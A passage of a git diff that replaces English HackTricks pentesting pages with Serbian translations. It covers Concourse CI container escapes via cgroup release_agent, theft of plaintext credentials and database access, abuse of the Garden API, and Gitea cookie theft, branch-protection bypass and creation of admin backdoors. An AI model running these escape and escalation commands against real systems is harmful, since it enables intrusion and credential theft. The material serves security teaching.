čvor iz privilegovane zadatke -#### Escaping to the node from privileged task - -In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex". - -In the following PoC we are going to use the release_agent to escape with some small modifications: +U prethodnim sekcijama smo videli kako da **izvršimo privilegovanu zadatak sa concourse**. Ovo neće dati kontejneru potpuno isti pristup kao privilegovana oznaka u docker kontejneru. Na primer, nećete videti uređaj datoteke čvora u /dev, tako da bi bekstvo moglo biti "kompleksnije". +U sledećem PoC-u ćemo koristiti release_agent da pobegnemo sa nekim malim izmenama: ```bash # Mounts the RDMA cgroup controller and create a child cgroup # If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist" @@ -270,14 +259,12 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" # Reads the output cat /output ``` - > [!WARNING] -> As you might have noticed this is just a [**regular release_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node +> Kao što ste možda primetili, ovo je samo [**redovni release_agent beg**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) samo modifikujući putanju cmd-a u čvoru -#### Escaping to the node from a Worker container - -A regular release_agent escape with a minor modification is enough for this: +#### Beg u čvor iz Worker kontejnera +Redovni release_agent beg sa manjom modifikacijom je dovoljan za ovo: ```bash mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x @@ -304,13 +291,11 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" # Reads the output cat /output ``` +#### Bekstvo na čvor iz Web kontejnera -#### Escaping to the node from the Web container - -Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless). - -However, it stores **local credentials in clear text**: +Čak i ako web kontejner ima neke odbrane onemogućene, **ne radi kao uobičajen privilegovan kontejner** (na primer, **ne možete** **montirati** i **kapaciteti** su veoma **ograničeni**, tako da su svi laki načini za bekstvo iz kontejnera beskorisni). +Međutim, čuva **lokalne akreditive u čistom tekstu**: ```bash cat /concourse-auth/local-users test:test @@ -319,11 +304,9 @@ env | grep -i local_user CONCOURSE_MAIN_TEAM_LOCAL_USER=test CONCOURSE_ADD_LOCAL_USER=test:test ``` +Možete koristiti te akreditive da **se prijavite na veb server** i **napravite privilegovanu kontejner i pobegnete na čvor**. -You cloud use that credentials to **login against the web server** and **create a privileged container and escape to the node**. - -In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info): - +U okruženju takođe možete pronaći informacije za **pristup postgresql** instanci koju koristi concourse (adresa, **korisničko ime**, **lozinka** i baza podataka među ostalim informacijama): ```bash env | grep -i postg CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238 @@ -344,39 +327,35 @@ select * from refresh_token; select * from teams; #Change the permissions of the users in the teams select * from users; ``` - -#### Abusing Garden Service - Not a real Attack +#### Zloupotreba Garden Service - Nije pravi napad > [!WARNING] -> This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before +> Ovo su samo neke zanimljive beleške o servisu, ali pošto sluša samo na localhost-u, ove beleške neće imati nikakav uticaj koji već nismo iskoristili ranije -By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what he needs to execute** (download the image and run each task). This sound pretty good for an attacker, but there are some nice protections: +Podrazumevano, svaki concourse radnik će pokretati [**Garden**](https://github.com/cloudfoundry/garden) servis na portu 7777. Ovaj servis koristi Web master da označi radniku **šta treba da izvrši** (preuzmi sliku i pokreni svaku zadatak). Ovo zvuči prilično dobro za napadača, ali postoje neka dobra zaštita: -- It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker. -- The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service. - -Concourse workers run with high container privileges: +- To je samo **izloženo lokalno** (127..0.0.1) i mislim da kada se radnik autentifikuje prema Web-u sa posebnim SSH servisom, stvara se tunel tako da web server može **da komunicira sa svakim Garden servisom** unutar svakog radnika. +- Web server **prati pokrenute kontejnere svake nekoliko sekundi**, i **neočekivani** kontejneri se **brišu**. Dakle, ako želite da **pokrenete prilagođeni kontejner** morate da **manipulišete** sa **komunikacijom** između web servera i garden servisa. +Concourse radnici rade sa visokim privilegijama kontejnera: ``` Container Runtime: docker Has Namespaces: - pid: true - user: false +pid: true +user: false AppArmor Profile: kernel Capabilities: - BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read +BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read Seccomp: disabled ``` - -However, techniques like **mounting** the /dev device of the node or release_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated. +Međutim, tehnike poput **montiranja** /dev uređaja čvora ili release_agent **neće raditi** (jer pravi uređaj sa datotečnim sistemom čvora nije dostupan, samo virtuelni). Ne možemo pristupiti procesima čvora, pa je bekstvo iz čvora bez kernel exploit-a komplikovano. > [!NOTE] -> In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**. +> U prethodnom odeljku smo videli kako da pobegnemo iz privilegovanog kontejnera, tako da ako možemo **izvršiti** komande u **privilegovanom kontejneru** koji je kreirao **trenutni** **radnik**, mogli bismo **pobegnuti na čvor**. -Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it. - -**Getting inside a running privileged container** +Imajte na umu da sam igrajući se sa concourse-om primetio da kada se novi kontejner pokrene da bi nešto izvršio, procesi kontejnera su dostupni iz radničkog kontejnera, tako da je to kao da kontejner kreira novi kontejner unutar sebe. +**Ulazak u pokrenuti privilegovani kontejner** ```bash # Get current container curl 127.0.0.1:7777/containers @@ -389,30 +368,26 @@ curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties # Execute a new process inside a container ## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53 wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \ - --header='Content-Type:application/json' \ - 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' +--header='Content-Type:application/json' \ +'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' # OR instead of doing all of that, you could just get into the ns of the process of the privileged container nsenter --target 76011 --mount --uts --ipc --net --pid -- sh ``` +**Kreiranje novog privilegovanog kontejnera** -**Creating a new privileged container** - -You can very easily create a new container (just run a random UID) and execute something on it: - +Možete vrlo lako kreirati novi kontejner (samo pokrenite nasumični UID) i izvršiti nešto na njemu: ```bash curl -X POST http://127.0.0.1:7777/containers \ - -H 'Content-Type: application/json' \ - -d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}' +-H 'Content-Type: application/json' \ +-d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}' # Wget will be stucked there as long as the process is being executed wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \ - --header='Content-Type:application/json' \ - 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' +--header='Content-Type:application/json' \ +'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' ``` - -However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring in HTTP, you could tamper the communication to avoid the deletion of unexpected containers: - +Međutim, veb server proverava svake nekoliko sekundi kontejnere koji se izvršavaju, i ako se otkrije neočekivani, biće obrisan. Pošto se komunikacija odvija u HTTP-u, mogli biste da manipulišete komunikacijom kako biste izbegli brisanje neočekivanih kontejnera: ``` GET /containers HTTP/1.1. Host: 127.0.0.1:7777. @@ -434,13 +409,8 @@ Host: 127.0.0.1:7777. User-Agent: Go-http-client/1.1. Accept-Encoding: gzip. ``` - -## References +## Референце - https://concourse-ci.org/vars.html {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md index 0cc6363a7..47fc56190 100644 --- a/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md @@ -8,19 +8,16 @@ #### With Docker-Compose -This docker-compose file simplifies the installation to do some tests with concourse: - +Ova docker-compose datoteka pojednostavljuje instalaciju za izvođenje nekih testova sa concourse: ```bash wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml docker-compose up -d ``` +Možete preuzeti komandnu liniju `fly` za vaš operativni sistem sa veba na `127.0.0.1:8080` -You can download the command line `fly` for your OS from the web in `127.0.0.1:8080` - -#### With Kubernetes (Recommended) - -You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart). +#### Sa Kubernetes-om (Preporučeno) +Možete lako implementirati concourse u **Kubernetes** (na **minikube** na primer) koristeći helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart). ```bash brew install helm helm repo add concourse https://concourse-charts.storage.googleapis.com/ @@ -31,94 +28,90 @@ helm install concourse-release concourse/concourse # If you need to delete it helm delete concourse-release ``` - -After generating the concourse env, you could generate a secret and give a access to the SA running in concourse web to access K8s secrets: - +После генерисања concourse env, можете генерисати тајну и дати приступ SA који ради у concourse web-у да приступи K8s тајнама: ```yaml echo 'apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: - name: read-secrets +name: read-secrets rules: - apiGroups: [""] - resources: ["secrets"] - verbs: ["get"] +resources: ["secrets"] +verbs: ["get"] --- apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: - name: read-secrets-concourse +name: read-secrets-concourse roleRef: - apiGroup: rbac.authorization.k8s.io - kind: ClusterRole - name: read-secrets +apiGroup: rbac.authorization.k8s.io +kind: ClusterRole +name: read-secrets subjects: - kind: ServiceAccount - name: concourse-release-web - namespace: default +name: concourse-release-web +namespace: default --- apiVersion: v1 kind: Secret metadata: - name: super - namespace: concourse-release-main +name: super +namespace: concourse-release-main type: Opaque data: - secret: MWYyZDFlMmU2N2Rm +secret: MWYyZDFlMmU2N2Rm ' | kubectl apply -f - ``` +### Kreirajte Pipeline -### Create Pipeline +Pipeline se sastoji od liste [Jobs](https://concourse-ci.org/jobs.html) koja sadrži uređenu listu [Steps](https://concourse-ci.org/steps.html). -A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html). +### Koraci -### Steps +Mogu se koristiti nekoliko različitih tipova koraka: -Several different type of steps can be used: +- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **pokreće** [**task**](https://concourse-ci.org/tasks.html) +- [`get` step](https://concourse-ci.org/get-step.html) preuzima [resource](https://concourse-ci.org/resources.html) +- [`put` step](https://concourse-ci.org/put-step.html) ažurira [resource](https://concourse-ci.org/resources.html) +- [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) konfiguriše [pipeline](https://concourse-ci.org/pipelines.html) +- [`load_var` step](https://concourse-ci.org/load-var-step.html) učitava vrednost u [local var](https://concourse-ci.org/vars.html#local-vars) +- [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) pokreće korake paralelno +- [`do` step](https://concourse-ci.org/do-step.html) pokreće korake sekvencijalno +- [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) pokreće korak više puta; jednom za svaku kombinaciju vrednosti varijabli +- [`try` step](https://concourse-ci.org/try-step.html) pokušava da pokrene korak i uspeva čak i ako korak ne uspe -- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html) -- the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html) -- the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html) -- the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html) -- the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars) -- the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel -- the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence -- the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values -- the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails +Svaki [step](https://concourse-ci.org/steps.html) u [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) se izvršava u **svojoj kontejneru**. Možete pokrenuti bilo šta što želite unutar kontejnera _(tj. pokrenuti moje testove, pokrenuti ovaj bash skript, izgraditi ovu sliku, itd.)_. Dakle, ako imate posao sa pet koraka, Concourse će kreirati pet kontejnera, po jedan za svaki korak. -Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step. - -Therefore, it's possible to indicate the type of container each step needs to be run in. - -### Simple Pipeline Example +Stoga, moguće je naznačiti tip kontejnera u kojem svaki korak treba da se izvrši. +### Jednostavan Primer Pipeline-a ```yaml jobs: - - name: simple - plan: - - task: simple-task - privileged: true - config: - # Tells Concourse which type of worker this task should run on - platform: linux - image_resource: - type: registry-image - source: - repository: busybox # images are pulled from docker hub by default - run: - path: sh - args: - - -cx - - | - sleep 1000 - echo "$SUPER_SECRET" - params: - SUPER_SECRET: ((super.secret)) +- name: simple +plan: +- task: simple-task +privileged: true +config: +# Tells Concourse which type of worker this task should run on +platform: linux +image_resource: +type: registry-image +source: +repository: busybox # images are pulled from docker hub by default +run: +path: sh +args: +- -cx +- | +sleep 1000 +echo "$SUPER_SECRET" +params: +SUPER_SECRET: ((super.secret)) ``` ```bash @@ -130,26 +123,21 @@ fly -t tutorial trigger-job --job pipe-name/simple --watch # From another console fly -t tutorial intercept --job pipe-name/simple ``` +Proverite **127.0.0.1:8080** da vidite tok pipeline-a. -Check **127.0.0.1:8080** to see the pipeline flow. +### Bash skripta sa izlazom/ulazom pipeline-a -### Bash script with output/input pipeline +Moguće je **sačuvati rezultate jednog zadatka u datoteku** i označiti da je to izlaz, a zatim označiti ulaz sledećeg zadatka kao izlaz prethodnog zadatka. Ono što concourse radi je da **montira direktorijum prethodnog zadatka u novom zadatku gde možete pristupiti datotekama koje je kreirao prethodni zadatak**. -It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**. +### Okidači -### Triggers +Ne morate ručno pokretati poslove svaki put kada ih trebate izvršiti, takođe ih možete programirati da se pokreću svaki put: -You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time: +- Prođe malo vremena: [Time resource](https://github.com/concourse/time-resource/) +- Na nove commit-e na glavnoj grani: [Git resource](https://github.com/concourse/git-resource) +- Novi PR-ovi: [Github-PR resource](https://github.com/telia-oss/github-pr-resource) +- Preuzmite ili pošaljite najnoviju sliku vaše aplikacije: [Registry-image resource](https://github.com/concourse/registry-image-resource/) -- Some time passes: [Time resource](https://github.com/concourse/time-resource/) -- On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource) -- New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource) -- Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/) - -Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html) +Pogledajte primer YAML pipeline-a koji se pokreće na nove commit-e na masteru u [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/gitea-security/README.md b/src/pentesting-ci-cd/gitea-security/README.md index bf4f6485a..57e955f77 100644 --- a/src/pentesting-ci-cd/gitea-security/README.md +++ b/src/pentesting-ci-cd/gitea-security/README.md @@ -2,141 +2,129 @@ {{#include ../../banners/hacktricks-training.md}} -## What is Gitea +## Šta je Gitea -**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go. +**Gitea** je **rešenje za hostovanje koda koje se lako upravlja i koje je samostalno hostovano**, napisano u Go-u. ![](<../../images/image (160).png>) -### Basic Information +### Osnovne informacije {{#ref}} basic-gitea-information.md {{#endref}} -## Lab - -To run a Gitea instance locally you can just run a docker container: +## Laboratorija +Da biste pokrenuli Gitea instancu lokalno, možete jednostavno pokrenuti docker kontejner: ```bash docker run -p 3000:3000 gitea/gitea ``` +Povežite se na port 3000 da biste pristupili veb stranici. -Connect to port 3000 to access the web page. - -You could also run it with kubernetes: - +Takođe možete da ga pokrenete sa kubernetes: ``` helm repo add gitea-charts https://dl.gitea.io/charts/ helm install gitea gitea-charts/gitea ``` +## Neautentifikovana Enumeracija -## Unauthenticated Enumeration +- Javni repozitorijumi: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos) +- Registrovani korisnici: [http://localhost:3000/explore/users](http://localhost:3000/explore/users) +- Registrovane organizacije: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations) -- Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos) -- Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users) -- Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations) +Imajte na umu da **podrazumevano Gitea omogućava novim korisnicima da se registruju**. Ovo neće pružiti posebno zanimljiv pristup novim korisnicima u odnosu na druge organizacije/korisnike repozitorijuma, ali **prijavljeni korisnik** može biti u mogućnosti da **vizualizuje više repozitorijuma ili organizacija**. -Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**. +## Interna Eksploatacija -## Internal Exploitation +Za ovaj scenario pretpostavićemo da ste dobili neki pristup github nalogu. -For this scenario we are going to suppose that you have obtained some access to a github account. +### Sa Korisničkim Akreditivima/Web Kolačićem -### With User Credentials/Web Cookie +Ako već imate akreditive za korisnika unutar organizacije (ili ste ukrali kolačić sesije) možete **samo da se prijavite** i proverite koje **dozvole imate** nad kojim **repozitorijumima,** u **kojim timovima** se nalazite, **lista drugih korisnika**, i **kako su repozitorijumi zaštićeni.** -If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how are the repos protected.** - -Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. +Imajte na umu da se **2FA može koristiti** tako da ćete moći da pristupite ovim informacijama samo ako takođe možete **proći tu proveru**. > [!NOTE] -> Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. +> Imajte na umu da ako **uspete da ukradete `i_like_gitea` kolačić** (trenutno konfigurisan sa SameSite: Lax) možete **potpuno imitirati korisnika** bez potrebe za akreditivima ili 2FA. -### With User SSH Key +### Sa Korisničkim SSH Ključem -Gitea allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied). - -With this key you can perform **changes in repositories where the user has some privileges**, however you can not use it to access gitea api to enumerate the environment. However, you can **enumerate local settings** to get information about the repos and user you have access to: +Gitea omogućava **korisnicima** da postave **SSH ključeve** koji će se koristiti kao **metoda autentifikacije za implementaciju koda** u njihovo ime (2FA se ne primenjuje). +Sa ovim ključem možete izvršiti **promene u repozitorijumima gde korisnik ima neka prava**, međutim ne možete ga koristiti za pristup gitea api da enumerišete okruženje. Međutim, možete **enumerisati lokalne postavke** da dobijete informacije o repozitorijumima i korisniku kojem imate pristup: ```bash # Go to the the repository folder # Get repo config and current user name and email git config --list ``` +Ako je korisnik konfigurisao svoje korisničko ime kao svoje gitea korisničko ime, možete pristupiti **javnim ključevima koje je postavio** na svom nalogu na _https://github.com/\.keys_, možete proveriti ovo da potvrdite da li se privatni ključ koji ste pronašli može koristiti. -If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. +**SSH ključevi** se takođe mogu postaviti u repozitorijume kao **deploy ključevi**. Svako ko ima pristup ovom ključiću moći će da **pokrene projekte iz repozitorijuma**. Obično, na serveru sa različitim deploy ključevima, lokalna datoteka **`~/.ssh/config`** će vam dati informacije o tome kojem ključu pripada. -**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. +#### GPG Ključevi -#### GPG Keys - -As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered. - -Check locally if the current user has any key with: +Kao što je objašnjeno [**ovde**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md), ponekad je potrebno potpisati commit-e ili biste mogli biti otkriveni. +Proverite lokalno da li trenutni korisnik ima neki ključ sa: ```shell gpg --list-secret-keys --keyid-format=long ``` +### Sa korisničkim tokenom -### With User Token +Za uvod o [**korisničkim tokenima proverite osnovne informacije**](basic-gitea-information.md#personal-access-tokens). -For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens). +Korisnički token može biti korišćen **umesto lozinke** za **autentifikaciju** protiv Gitea servera [**putem API-ja**](https://try.gitea.io/api/swagger#/). Imaće **potpun pristup** korisniku. -A user token can be used **instead of a password** to **authenticate** against Gitea server [**via API**](https://try.gitea.io/api/swagger#/). it will has **complete access** over the user. +### Sa Oauth aplikacijom -### With Oauth Application +Za uvod o [**Gitea Oauth aplikacijama proverite osnovne informacije**](./#with-oauth-application). -For an introduction about [**Gitea Oauth Applications check the basic information**](./#with-oauth-application). +Napadač može kreirati **malicious Oauth aplikaciju** da bi pristupio privilegovanim podacima/akcijama korisnika koji je verovatno prihvataju kao deo phishing kampanje. -An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. +Kao što je objašnjeno u osnovnim informacijama, aplikacija će imati **potpun pristup korisničkom nalogu**. -As explained in the basic information, the application will have **full access over the user account**. +### Zaobilaženje zaštite grane -### Branch Protection Bypass +U Github-u imamo **github akcije** koje po defaultu dobijaju **token sa pristupom za pisanje** nad repozitorijumom koji se može koristiti za **zaobilaženje zaštita grane**. U ovom slučaju to **ne postoji**, tako da su zaobilaženja ograničenija. Ali hajde da pogledamo šta može da se uradi: -In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done: +- **Omogući Push**: Ako bilo ko sa pristupom za pisanje može da pošalje na granu, samo pošaljite na nju. +- **Whitelist Restrict Pus**h: Na isti način, ako ste deo ove liste, pošaljite na granu. +- **Omogući Merge Whitelist**: Ako postoji whitelist za spajanje, morate biti unutar nje. +- **Zahtevajte odobrenja veće od 0**: Tada... morate kompromitovati drugog korisnika. +- **Ograničite odobrenja na whitelisted**: Ako samo whitelisted korisnici mogu odobriti... morate kompromitovati drugog korisnika koji je unutar te liste. +- **Odbacite zastarela odobrenja**: Ako odobrenja nisu uklonjena novim commit-ima, mogli biste preuzeti već odobren PR da ubacite svoj kod i spojite PR. -- **Enable Push**: If anyone with write access can push to the branch, just push to it. -- **Whitelist Restricted Pus**h: The same way, if you are part of this list push to the branch. -- **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it -- **Require approvals is bigger than 0**: Then... you need to compromise another user -- **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list -- **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR. +Napomena: **ako ste admin org/repo** možete zaobići zaštite. -Note that **if you are an org/repo admin** you can bypass the protections. +### Nabrajanje Webhook-ova -### Enumerate Webhooks +**Webhook-ovi** su sposobni da **pošalju specifične gitea informacije na neka mesta**. Možda ćete moći da **iskoristite tu komunikaciju**.\ +Međutim, obično se postavlja **tajna** koju ne možete **dobiti** u **webhook-u** koja će **sprečiti** spoljne korisnike koji znaju URL webhook-a, ali ne i tajnu, da **iskoriste taj webhook**.\ +Ali u nekim prilikama, ljudi umesto da postave **tajnu** na njeno mesto, **postavljaju je u URL** kao parametar, tako da **proveravanje URL-ova** može omogućiti da **pronađete tajne** i druga mesta koja biste mogli dalje iskoristiti. -**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\ -However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\ -But in some occasions, people instead of setting the **secret** in its place, they **set it in the URL** as a parameter, so **checking the URLs** could allow you to **find secrets** and other places you could exploit further. +Webhook-ovi se mogu postaviti na **repo i na org nivou**. -Webhooks can be set at **repo and at org level**. +## Post Eksploatacija -## Post Exploitation +### Unutar servera -### Inside the server +Ako ste nekako uspeli da uđete u server na kojem Gitea radi, trebali biste potražiti Gitea konfiguracioni fajl. Po defaultu se nalazi u `/data/gitea/conf/app.ini` -If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini` +U ovom fajlu možete pronaći **ključeve** i **lozinke**. -In this file you can find **keys** and **passwords**. +U Gitea putanji (po defaultu: /data/gitea) možete pronaći i zanimljive informacije kao što su: -In the gitea path (by default: /data/gitea) you can find also interesting information like: +- **sqlite** DB: Ako Gitea ne koristi eksternu bazu podataka, koristiće sqlite bazu. +- **sesije** unutar foldera sesija: Pokretanjem `cat sessions/*/*/*` možete videti korisnička imena prijavljenih korisnika (Gitea takođe može sačuvati sesije unutar DB-a). +- **jwt privatni ključ** unutar jwt foldera. +- Više **osetljivih informacija** može se pronaći u ovom folderu. -- The **sqlite** DB: If gitea is not using an external db it will use a sqlite db -- The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea could also save the sessions inside the DB). -- The **jwt private key** inside the jwt folder -- More **sensitive information** could be found in this folder +Ako ste unutar servera, možete takođe **koristiti `gitea` binarni fajl** za pristup/modifikaciju informacija: -If you are inside the server you can also **use the `gitea` binary** to access/modify information: - -- `gitea dump` will dump gitea and generate a .zip file -- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence) -- `gitea admin user change-password --username admin --password newpassword` Change the password -- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token +- `gitea dump` će dumpovati Gitea i generisati .zip fajl. +- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` će generisati token naznačenog tipa (persistence). +- `gitea admin user change-password --username admin --password newpassword` promenite lozinku. +- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` kreirajte novog admin korisnika i dobijte pristupni token. {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md index e6e4d9ba3..962e569c9 